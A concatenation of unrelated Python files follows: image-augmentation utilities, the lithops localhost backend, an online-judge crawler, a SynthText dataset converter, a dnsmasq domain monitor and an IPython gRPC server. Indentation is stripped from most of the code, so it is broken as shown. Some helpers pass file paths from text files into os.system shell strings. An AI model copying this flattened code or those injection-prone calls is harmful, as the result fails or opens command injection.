S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = (
random.uniform(0.5 - translate, 0.5 + translate) * width
) # x translation (pixels)
T[1, 2] = (
random.uniform(0.5 - translate, 0.5 + translate) * height
) # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(
img, M, dsize=(width, height), borderValue=(114, 114, 114)
)
else: # affine
img = cv2.warpAffine(
img, M[:2], dsize=(width, height), borderValue=(114, 114, 114)
)
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(
n * 4, 2
) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
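# Illustrative sanity check (an assumption, not part of the original file): with all
# augmentation hyper-parameters at 0 the combined matrix M = T @ S @ R @ P @ C reduces
# to the identity, so both the image and the targets pass through unchanged.
def _example_identity_perspective():
    img = np.full((416, 416, 3), 114, dtype=np.uint8)
    targets = np.array([[0, 100, 100, 200, 200]], dtype=np.float32)  # [cls, x1, y1, x2, y2]
    out_img, out_targets = random_perspective(img, targets, degrees=0, translate=0,
                                              scale=0, shear=0, perspective=0)
    assert out_img.shape == img.shape and len(out_targets) == 1
    return out_img, out_targets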
def box_candidates(
box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1
): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (
(w2 > wh_thr)
& (h2 > wh_thr)
& (w2 * h2 / (w1 * h1 + 1e-16) > area_thr)
& (ar < ar_thr)
) # candidates
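# Illustrative sketch (an assumption, not part of the original file): a 100x100 box that
# shrinks to 5x5 after augmentation is rejected because its area ratio (0.0025) falls
# below area_thr=0.1.
def _example_box_candidates():
    box1 = np.array([[0.0], [0.0], [100.0], [100.0]])  # before augment, shape (4, n)
    box2 = np.array([[0.0], [0.0], [5.0], [5.0]])      # after augment, shape (4, n)
    keep = box_candidates(box1, box2)
    assert not keep[0]
    return keep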
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * (
np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)
).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = (
[0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
) # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
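# Illustrative sketch (an assumption, not part of the original file): cutout() draws
# random colour patches on the image in place and returns only the labels that remain
# less than 60% obscured.
def _example_cutout():
    img = np.zeros((640, 640, 3), dtype=np.uint8)
    labels = np.array([[0, 10, 10, 200, 200]], dtype=np.float32)  # [cls, x1, y1, x2, y2]
    kept = cutout(img, labels)
    return kept  # a (possibly smaller) subset of the input labels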
def reduce_img_size(
path="path/images", img_size=1024
): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + "_reduced" # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob("%s/*.*" % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(
img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA
) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print("WARNING: image failure %s" % f)
def recursive_dataset2bmp(
dataset="path/dataset_bmp",
): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + "/" + file
s = Path(file).suffix
if s == ".txt": # replace text
with open(p, "r") as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, ".bmp")
with open(p, "w") as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, ".bmp"), cv2.imread(p))
if s != ".bmp":
os.system("rm '%s'" % p)
def imagelist2folder(
path="path/images.txt",
): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, "r") as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path="./new"):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
localhost.py
|
#
# (C) Copyright Cloudlab URV 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import queue
import lithops
import logging
import shutil
import threading
import subprocess as sp
from shutil import copyfile
from lithops.constants import TEMP, LITHOPS_TEMP_DIR, COMPUTE_CLI_MSG, RN_LOG_FILE, JOBS_PREFIX
from lithops.utils import is_lithops_worker
logger = logging.getLogger(__name__)
RUNNER = os.path.join(LITHOPS_TEMP_DIR, 'runner.py')
LITHOPS_LOCATION = os.path.dirname(os.path.abspath(lithops.__file__))
class LocalhostHandler:
"""
A LocalhostHandler object is used by invokers and other components to access
the underlying localhost backend without exposing the implementation details.
"""
def __init__(self, localhost_config):
logger.debug('Creating Localhost compute client')
self.config = localhost_config
self.jobs = {} # dict to store executed jobs (job_keys) and PIDs
self.env = {} # dict to store environments
self.job_queue = queue.Queue()
self.job_manager = None
self.should_run = True
msg = COMPUTE_CLI_MSG.format('Localhost compute')
logger.info("{}".format(msg))
def init(self):
"""
Init tasks for localhost
"""
pass
def start_manager(self):
"""
Starts manager thread to keep order in tasks
"""
def job_manager():
logger.debug('Starting localhost job manager')
self.should_run = True
while self.should_run:
job_payload, job_filename = self.job_queue.get()
if job_payload is None and job_filename is None:
break
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
job_key = job_payload['job_key']
runtime_name = job_payload['runtime_name']
env = self.get_env(runtime_name)
process = env.run(job_payload, job_filename)
self.jobs[job_key] = process
process.communicate() # blocks until the process finishes
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Execution finished')
if self.job_queue.empty():
break
self.job_manager = None
logger.debug("Localhost job manager stopped")
if not self.job_manager:
self.job_manager = threading.Thread(target=job_manager)
self.job_manager.start()
def _get_env_type(self, runtime_name):
"""
Gets the environment type based on the runtime name
"""
return 'default' if '/' not in runtime_name else 'docker'
def get_env(self, runtime_name):
"""
Generates the proper runtime environment based on the runtime name
"""
if runtime_name not in self.env:
if '/' not in runtime_name:
env = DefaultEnv()
else:
pull_runtime = self.config.get('pull_runtime', False)
env = DockerEnv(runtime_name, pull_runtime)
env.setup()
self.env[runtime_name] = env
return self.env[runtime_name]
def create_runtime(self, runtime_name, *args):
"""
Extract the runtime metadata and preinstalled modules
"""
logger.info(f"Extracting preinstalled Python modules from {runtime_name}")
env = self.get_env(runtime_name)
runtime_metadata = env.preinstalls()
return runtime_metadata
def invoke(self, job_payload):
"""
Run the job description against the selected environment
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
runtime_name = job_payload['runtime_name']
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Putting job into localhost queue')
self.start_manager()
env = self.get_env(runtime_name)
job_filename = env._prepare_job_file(job_payload)
self.job_queue.put((job_payload, job_filename))
def get_runtime_key(self, runtime_name, *args):
"""
Generate the runtime key that identifies the runtime
"""
env_type = self._get_env_type(runtime_name)
runtime_key = os.path.join('localhost', env_type, runtime_name.strip("/"))
return runtime_key
def get_backend_type(self):
"""
Wrapper method that returns the type of the backend (Batch or FaaS)
"""
return 'batch'
def clean(self):
"""
Deletes all local runtimes
"""
pass
def clear(self, job_keys=None):
"""
Kills all running jobs processes
"""
self.should_run = False
while not self.job_queue.empty():
try:
self.job_queue.get(False)
except Exception:
pass
if job_keys:
for job_key in job_keys:
try:
# None means alive
if job_key not in self.jobs or \
self.jobs[job_key].poll() is not None:
continue
logger.debug(f'Killing job {job_key} with '
f'PID {self.jobs[job_key].pid}')
self.jobs[job_key].kill()
except Exception:
pass
else:
for job_key in self.jobs:
try:
if self.jobs[job_key].poll() is not None:
continue
logger.debug(f'Killing job {job_key} with '
f'PID {self.jobs[job_key].pid}')
self.jobs[job_key].kill()
except Exception:
pass
if self.job_manager:
self.job_queue.put((None, None))
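# Illustrative usage sketch (an assumption, not part of the original file): a minimal
# interaction with the handler above. A runtime name without '/' selects the default
# (current python3) environment; job payloads are normally built by the lithops invoker.
def _example_localhost_handler():
    handler = LocalhostHandler({'pull_runtime': False})
    runtime_meta = handler.create_runtime('python3')  # preinstalled modules of the default env
    return runtime_meta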
class BaseEnv():
"""
Base environment class for shared methods
"""
def __init__(self, runtime):
self.runtime = runtime
def _copy_lithops_to_tmp(self):
if is_lithops_worker() and os.path.isfile(RUNNER):
return
os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)
try:
shutil.rmtree(os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
except FileNotFoundError:
pass
shutil.copytree(LITHOPS_LOCATION, os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
src_handler = os.path.join(LITHOPS_LOCATION, 'localhost', 'runner.py')
copyfile(src_handler, RUNNER)
def _prepare_job_file(self, job_payload):
"""
Creates the job file that contains the job payload to be executed
"""
job_key = job_payload['job_key']
storage_bucket = job_payload['config']['lithops']['storage_bucket']
local_job_dir = os.path.join(LITHOPS_TEMP_DIR, storage_bucket, JOBS_PREFIX)
docker_job_dir = f'/tmp/lithops/{storage_bucket}/{JOBS_PREFIX}'
job_file = f'{job_key}-job.json'
os.makedirs(local_job_dir, exist_ok=True)
local_job_filename = os.path.join(local_job_dir, job_file)
with open(local_job_filename, 'w') as jl:
json.dump(job_payload, jl, default=str)
if isinstance(self, DockerEnv):
job_filename = '{}/{}'.format(docker_job_dir, job_file)
else:
job_filename = local_job_filename
return job_filename
class DockerEnv(BaseEnv):
"""
Docker environment uses a docker runtime image
"""
def __init__(self, docker_image, pull_runtime):
logger.debug(f'Starting Docker Environment for {docker_image}')
super().__init__(runtime=docker_image)
self.pull_runtime = pull_runtime
def setup(self):
logger.debug(f'Setting up Docker environment')
self._copy_lithops_to_tmp()
if self.pull_runtime:
logger.debug('Pulling Docker runtime {}'.format(self.runtime))
sp.run('docker pull {}'.format(self.runtime), shell=True, check=True,
stdout=sp.PIPE, universal_newlines=True)
def preinstalls(self):
if not os.path.isfile(RUNNER):
self.setup()
cmd = (f'docker run --rm -v {TEMP}:/tmp --entrypoint "python3" '
f'{self.runtime} /tmp/lithops/runner.py preinstalls')
process = sp.run(cmd, shell=True, check=True, stdout=sp.PIPE, universal_newlines=True)
runtime_meta = json.loads(process.stdout.strip())
return runtime_meta
def run(self, job_payload, job_filename):
"""
Runs a job
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = len(job_payload['call_ids'])
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Going to '
f'run {total_calls} activations in the localhost worker')
if not os.path.isfile(RUNNER):
self.setup()
cmd = (f'docker run --rm -v {TEMP}:/tmp --entrypoint "python3" '
f'{self.runtime} /tmp/lithops/runner.py run {job_filename}')
log = open(RN_LOG_FILE, 'a')
process = sp.Popen(cmd, shell=True, stdout=log, stderr=log)
return process
class DefaultEnv(BaseEnv):
"""
Default environment uses current python3 installation
"""
def __init__(self):
logger.debug(f'Starting Default Environment for {sys.executable}')
super().__init__(runtime=sys.executable)
def setup(self):
logger.debug(f'Setting up Default environment')
self._copy_lithops_to_tmp()
def preinstalls(self):
if not os.path.isfile(RUNNER):
self.setup()
cmd = f'"{self.runtime}" "{RUNNER}" preinstalls'
process = sp.run(cmd, shell=True, check=True, stdout=sp.PIPE, universal_newlines=True)
runtime_meta = json.loads(process.stdout.strip())
return runtime_meta
def run(self, job_payload, job_filename):
"""
Runs a job
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = len(job_payload['call_ids'])
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Going to '
f'run {total_calls} activations in the localhost worker')
if not os.path.isfile(RUNNER):
self.setup()
cmd = f'"{self.runtime}" "{RUNNER}" run {job_filename}'
log = open(RN_LOG_FILE, 'a')
process = sp.Popen(cmd, shell=True, stdout=log, stderr=log)
return process
|
main.py
|
"""爬虫模块"""
import re
import threading
import time
import pymongo
import requests
import config
import support.HDU
import support.POJ
import support.SDUT
# Database
db = pymongo.MongoClient(config.dbhost)[config.dbname]
def crawl(oj, sid):
"""爬取一道题目并返回该题目的dict"""
# 下载题目页面
r = requests.get(oj.problem_url % sid, timeout=config.timeout)
r.encoding = oj.encoding
html = r.text
# Build the problem dict
problem = {
"soj": oj.name,
"sid": sid,
}
# Iterate over regexp and extract each field with a regular expression
for key, reg in oj.regexp.items():
match = re.findall(reg, html)
if not match:
problem[key] = ""
# The source field is allowed to be empty
# if key == "source":
# problem["source"] = ""
# Any other field that fails to match makes the function return None directly
# else:
# return None
else:
# Save the matched value for this field
problem[key] = match[0]
# Convert timelimit and memorylimit from strings to integers
problem["timelimit"] = int(problem["timelimit"])
problem["memorylimit"] = int(problem["memorylimit"])
# Replace relative URLs in the description with absolute URLs
problem["description"] = oj.replace_src(problem["description"])
return problem
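# Illustrative sketch (an assumption, not part of the original file): the interface that
# crawl() expects an OJ support module (e.g. support.HDU) to expose. The regular
# expressions below are placeholders, not the real patterns used by the support modules.
class _ExampleOJ:
    name = "EXAMPLE"
    encoding = "utf-8"
    problem_url = "http://example.com/problem?id=%d"
    minid, maxid = 1000, 1001
    regexp = {
        "title": r"<h1>(.*?)</h1>",
        "timelimit": r"Time Limit: (\d+)",
        "memorylimit": r"Memory Limit: (\d+)",
        "description": r'<div class="content">(.*?)</div>',
    }
    @staticmethod
    def replace_src(html):
        # The real modules rewrite relative image URLs to absolute ones here
        return html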
def process(oj):
"""爬取某oj所有题目并保存到数据库"""
no_such_sid_times = 0
sid = oj.minid
while sid <= oj.maxid:
try:
# Crawl one problem
problem = crawl(oj, sid)
# Nothing was extracted
if not problem:
print("[NO MATCH] [SKIP] %s-%d" % (oj.name, sid))
# If the problem has been deleted on the OJ, make sure it is removed from the local database too
db["problem"].delete_one({
"soj": oj.name,
"sid": sid,
})
sid += 1
continue
except ValueError:
print("[ERROR] No such sid %s-%d" % (oj.name, sid))
no_such_sid_times += 1
if no_such_sid_times >= 120:
print("[INFO] Continuous 120 problems from %s can not be crawled" % oj.name)
break
sid += 1
continue
except Exception as err:
# Retry on any unknown error (network timeout, etc.)
print("[ERROR] [RETRY] %s-%d %s" % (oj.name, sid, err))
# Retry once per second
time.sleep(1)
# Not incrementing sid here is what implements the retry
continue
# If the problem already exists in the database
if db["problem"].find({
"soj": oj.name,
"sid": sid,
}).count():
# Do not create a new document; just update the existing one
db["problem"].update_one({
"soj": oj.name,
"sid": sid,
}, {
"$set": problem,
})
print("[SUCCESS] [UPDATE] %s-%d %s" % (oj.name, sid, problem["title"]))
else:
# Create a new problem document
problem["totalsm"] = 0
problem["totalac"] = 0
db["problem"].insert_one(problem)
print("[SUCCESS] [CREATE] %s-%d %s" % (oj.name, sid, problem["title"]))
no_such_sid_times = 0
# Next problem
sid += 1
def process_with_threading():
thread_pool = []
thread_pool.append(threading.Thread(target=process, args=(support.HDU,)))
thread_pool.append(threading.Thread(target=process, args=(support.POJ,)))
thread_pool.append(threading.Thread(target=process, args=(support.SDUT,)))
for t in thread_pool:
t.start()
for t in thread_pool:
t.join()
print("Finished")
if __name__ == "__main__":
process_with_threading()
|
create_synthtext_nori.py
|
import os
import math
import argparse
import pickle
from PIL import Image
from multiprocessing import Process
import numpy as np
import cv2
import nori2 as nori
import scipy.io as sio
from tqdm import tqdm
def get_file_list(dir_path):
print('Getting file list: ')
file_list = []
for dir_1 in os.listdir(dir_path):
for dir_2 in os.listdir('{}/{}'.format(dir_path, dir_1)):
for f in os.listdir(os.path.join(dir_path, dir_1, dir_2)):
if f.endswith('.bin'):
file_list.append(os.path.join(dir_path, dir_1, dir_2, f))
print('Total: {}'.format(len(file_list)))
return file_list
def get_l2_dist(point1, point2):
'''
:param point1: tuple (x, y) int or float
:param point2: tuple (x, y)
:return: float
'''
return float(((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2)**0.5)
def qual_square(char_box):
a = get_l2_dist(char_box[0], char_box[1])
b = get_l2_dist(char_box[1], char_box[2])
c = get_l2_dist(char_box[2], char_box[0])
p = (a + b + c) / 2
s = np.sqrt(p * (p - a) * (p - b) * (p - c))
a = get_l2_dist(char_box[2], char_box[3])
b = get_l2_dist(char_box[3], char_box[0])
p = (a + b + c) / 2
s += np.sqrt(p * (p - a) * (p - b) * (p - c))
return s
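# Illustrative check (an assumption, not part of the original file): qual_square splits
# the quadrilateral along the 0-2 diagonal and sums the two Heron-formula triangle
# areas, so an axis-aligned unit square yields an area of 1.
def _example_qual_square():
    area = qual_square([(0, 0), (1, 0), (1, 1), (0, 1)])
    assert abs(area - 1.0) < 1e-6
    return area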
def sample_filter(char_box, word, aspect_ratio):
# Remove the sample if any of its character boxes has zero area
char_box = np.array(char_box, dtype=np.int32)
char_box = char_box.T.reshape((-1, 4, 2))
char_box = np.clip(char_box, 0, math.inf)
for i in range(len(char_box)):
s = qual_square(char_box[i])
if s == 0:
return False
v1 = get_l2_dist(char_box[0][0], char_box[0][1])
v2 = get_l2_dist(char_box[0][1], char_box[0][2])
v3 = get_l2_dist(char_box[0][2], char_box[0][3])
v4 = get_l2_dist(char_box[0][3], char_box[0][0])
if v1 <= 1 or v2 <= 1 or v3 <= 1 or v4 <= 1:
return False
flag = True
if aspect_ratio < 0.2:
return False
if word == "":
return False
return True
def run_child(dest_path, file_list, job_no, margin_ratio, max_num):
dest_path = '{}/{}.nori'.format(dest_path, job_no)
if os.path.exists(dest_path):
os.system('rm -r {0}'.format(dest_path))
with nori.open(dest_path, 'w') as image_writer:
count = 0
for filename in file_list:
count += 1
if count > max_num:
break
if (count - 1) % 500 == 0:
print('Job {}: total: {}, generated: {}'.format(job_no, max_num, count - 1))
with open(filename, 'rb') as pklfile:
pkl = pickle.load(pklfile, encoding='latin1')
img = pkl['img'].copy()
img_height, img_width, _ = img.shape
word_bbs = np.array(pkl['contour'][1], dtype=np.int32)
word_bbs = np.split(word_bbs, len(word_bbs), 0)
word_bbs = [x.transpose([1, 0, 2]) for x in word_bbs]
char_bbs = np.array(pkl['contour'][0], dtype=np.int32)
chars = pkl['chars']
char_bb_index = 0
for i in range(len(word_bbs)):
bb = word_bbs[i]
word = chars[i]
bb = np.squeeze(bb, axis=1)
min_w, min_h = np.amin(bb, axis=0)
max_w, max_h = np.amax(bb, axis=0)
#margin = margin_ratio * np.sqrt((max_w - min_w) * (max_h - min_h))
margin = 0
min_w = int(round(max(min_w - margin * (np.random.rand() + 0.5), 0)))
min_h = int(round(max(min_h - margin * (np.random.rand() + 0.5), 0)))
max_w = int(round(min(max_w + margin * (np.random.rand() + 0.5), img_width - 1)))
max_h = int(round(min(max_h + margin * (np.random.rand() + 0.5), img_height - 1)))
char_bb = char_bbs[char_bb_index:char_bb_index + len(word)] #N, 4, 2
char_bb_index += len(word)
char_bb[:, :, ::2] = char_bb[:, :, ::2] - min_w
char_bb[:, :, 1::2] = char_bb[:, :, 1::2] - min_h
if not np.all(char_bb >= 0):
continue
img_cropped = img[min_h:max_h, min_w:max_w].copy()
try:
img_data = cv2.imencode('.jpg', img_cropped)[1].tobytes()
except:
continue
char_box = char_bb.T
words = ''.join(word)
aspect_ratio = (max_w - min_w) / (max_h - min_h)
if(sample_filter(char_box.tolist(), words, aspect_ratio)):
image_writer.put(img_data, filename='', extra=dict(char_box=char_box.tolist(), words=words, aspect_ratio=aspect_ratio))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='/unsullied/sharefs/_csg_algorithm/Interns/guanyushuo/OCR/SynthText/Synthtext/SynthTextData/results_bin',
help='Target tar file to impact into nori file')
parser.add_argument('--dest_path', type=str,
default='/unsullied/sharefs/_csg_algorithm/Interns/yangmingkun/datasets/scenetext/noris/synthtext',
help='Destination file path to store the generated nori file')
parser.add_argument('--jobs', type=int)
parser.add_argument('--margin', type=float, default=0.1)
parser.add_argument('--max_num', type=int)
args = parser.parse_args()
data_dir = args.data_dir
dest_path = args.dest_path
if os.path.exists(dest_path):
os.system('rm -r {0}'.format(dest_path))
file_list = get_file_list(data_dir)
file_list_length = len(file_list)
step = int(math.ceil(file_list_length / args.jobs))
processes = []
for i in range(args.jobs):
begin = i * step
end = min((i + 1) * step, file_list_length)
if args.max_num is None:
p = Process(target=run_child, args=(dest_path, file_list[begin:end], i, args.margin, end - begin))
else:
p = Process(target=run_child, args=(dest_path, file_list[begin:end], i, args.margin, args.max_num))
p.daemon = True
p.start()
processes.append(p)
for p in processes:
p.join()
if __name__ == '__main__':
main()
|
monitor_domains.py
|
from collections import defaultdict
ip2queryShort=defaultdict(lambda: {})
ip2query=defaultdict(lambda: {})
def getIPQueryMappingShort():
return ip2queryShort
def getIPQueryMapping():
return ip2query
def sortDomainsByLastResolved(domains,reverse=False):
now=time.time()
domains.sort(reverse=reverse, key=lambda d: (lastDomainResolveTime(d) or now+2,lastDomainResolveTime(d,True) or now+1,d))
resolveShortTimeList={}
resolveTimeList={}
def wasResolved(domain,short=False):
"was domain or its short form resolved this session"
l = resolveTimeList
if short:
domain=ip2dns.shorten(domain)
l = resolveShortTimeList
resolved = l.get(domain,False)
return True if resolved else False
def wasResolvedBy(domain,ip=False,short=False):
raise NotImplementedError("todo")
def filterOnlyResolvedDomains(domains,short=False):
"return the domains that were actually resolved during this session (short=compare using short form)"
ret=[]
for d in domains:
if wasResolved(d,short):
ret.append(d)
if ret!=[]:
return ret
return False
# For prioritizing shown domains
def lastDomainResolveTime(domain,short=False):
l = resolveTimeList
if short:
domain=ip2dns.shorten(domain)
l=resolveShortTimeList
return l.get(domain)
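# Illustrative sketch (an assumption, not part of the original file): the shape of the
# in-memory mappings kept above, keyed by source IP address and then by (short) domain
# name, with the value being the last time the query was observed.
def _example_mapping_shape():
    import ipaddress
    import time as _time
    source = ipaddress.ip_address("192.168.1.10")  # hypothetical client
    now = _time.time()
    ip2query[source]["www.example.com"] = now
    ip2queryShort[source]["example.com"] = now
    resolveTimeList["www.example.com"] = now
    resolveShortTimeList["example.com"] = now
    return dict(ip2query)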
import time
import dnsmasq_parser
import ip2dns
import ipaddress
import config
def onJournalMessage(entry):
l=entry["MESSAGE"]
ts=entry['__REALTIME_TIMESTAMP'] #we are parsing real time, no use
q = dnsmasq_parser.parse_query(l)
if q:
source = ipaddress.ip_address(q["source"])
domain=q["query"]
if domain in config.ignored_domains:
return
sdomain=ip2dns.shorten(domain)
now=time.time()
ip2query[source][domain]=now
ip2queryShort[source][sdomain]=now
resolveTimeList[domain]=now
resolveShortTimeList[sdomain]=now
#print(q)
else:
ip2dns.onJournalMessage(entry)
import select
from systemd import journal
def monitor():
reader = journal.Reader()
reader.log_level(journal.LOG_INFO)
reader.add_match(_SYSTEMD_UNIT="dnsmasq.service")
reader.seek_tail()
reader.get_previous()
poller = select.poll()
poller.register(reader, reader.get_events())
try:
while poller.poll():
if reader.process() != journal.APPEND:
continue
for entry in reader:
if entry['MESSAGE']:
onJournalMessage(entry)
except KeyboardInterrupt as e:
return
import threading
def start_monitoring():
monitor_thread = threading.Thread(name='monitorthread', target=monitor, daemon=True)
monitor_thread.start()
if __name__ == '__main__':
monitor()
|
ipython_server.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import jupyter_client
import os
import sys
import threading
import time
from concurrent import futures
import grpc
import ipython_pb2
import ipython_pb2_grpc
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
class IPython(ipython_pb2_grpc.IPythonServicer):
def __init__(self, server):
self._status = ipython_pb2.STARTING
self._server = server
# issue with execute_interactive and auto completion: https://github.com/jupyter/jupyter_client/issues/429
# in any case, ipython does not support running code and auto-completion at the same time: https://github.com/jupyter/notebook/issues/3763
# For now we lock to ensure that no concurrency bug can "hang" the kernel
self._lock = threading.Lock()
def start(self):
print("starting...")
sys.stdout.flush()
self._km, self._kc = jupyter_client.manager.start_new_kernel(kernel_name='python')
self._status = ipython_pb2.RUNNING
def execute(self, request, context):
print("execute code:\n")
print(request.code.encode('utf-8'))
sys.stdout.flush()
stream_reply_queue = queue.Queue(maxsize = 30)
payload_reply = []
def _output_hook(msg):
msg_type = msg['header']['msg_type']
content = msg['content']
print("******************* CONTENT ******************")
outStatus, outType, output = ipython_pb2.SUCCESS, None, None
# prepare the reply
if msg_type == 'stream':
outType = ipython_pb2.TEXT
output = content['text']
elif msg_type in ('display_data', 'execute_result'):
print(content['data'])
# The if-else order matters and must not be changed, because ipython may provide multiple outputs.
# TEXT is the last-resort type.
if 'text/html' in content['data']:
outType = ipython_pb2.HTML
output = content['data']['text/html']
elif 'image/jpeg' in content['data']:
outType = ipython_pb2.JPEG
output = content['data']['image/jpeg']
elif 'image/png' in content['data']:
outType = ipython_pb2.PNG
output = content['data']['image/png']
elif 'application/javascript' in content['data']:
outType = ipython_pb2.HTML
output = '<script> ' + content['data']['application/javascript'] + ' </script>\n'
elif 'application/vnd.holoviews_load.v0+json' in content['data']:
outType = ipython_pb2.HTML
output = '<script> ' + content['data']['application/vnd.holoviews_load.v0+json'] + ' </script>\n'
elif 'text/plain' in content['data']:
outType = ipython_pb2.TEXT
output = content['data']['text/plain']
elif msg_type == 'error':
outStatus = ipython_pb2.ERROR
outType = ipython_pb2.TEXT
output = '\n'.join(content['traceback'])
# send reply if we supported the output type
if outType is not None:
stream_reply_queue.put(
ipython_pb2.ExecuteResponse(status=outStatus,
type=outType,
output=output))
def execute_worker():
reply = self._kc.execute_interactive(request.code,
output_hook=_output_hook,
timeout=None)
payload_reply.append(reply)
t = threading.Thread(name="ConsumerThread", target=execute_worker)
with self._lock:
t.start()
# We want to wait for the end of the execution (and for the queue to be empty).
# When the thread is no longer alive, the execution is complete.
# However, we also check that the kernel is alive because, in case of OOM or other errors,
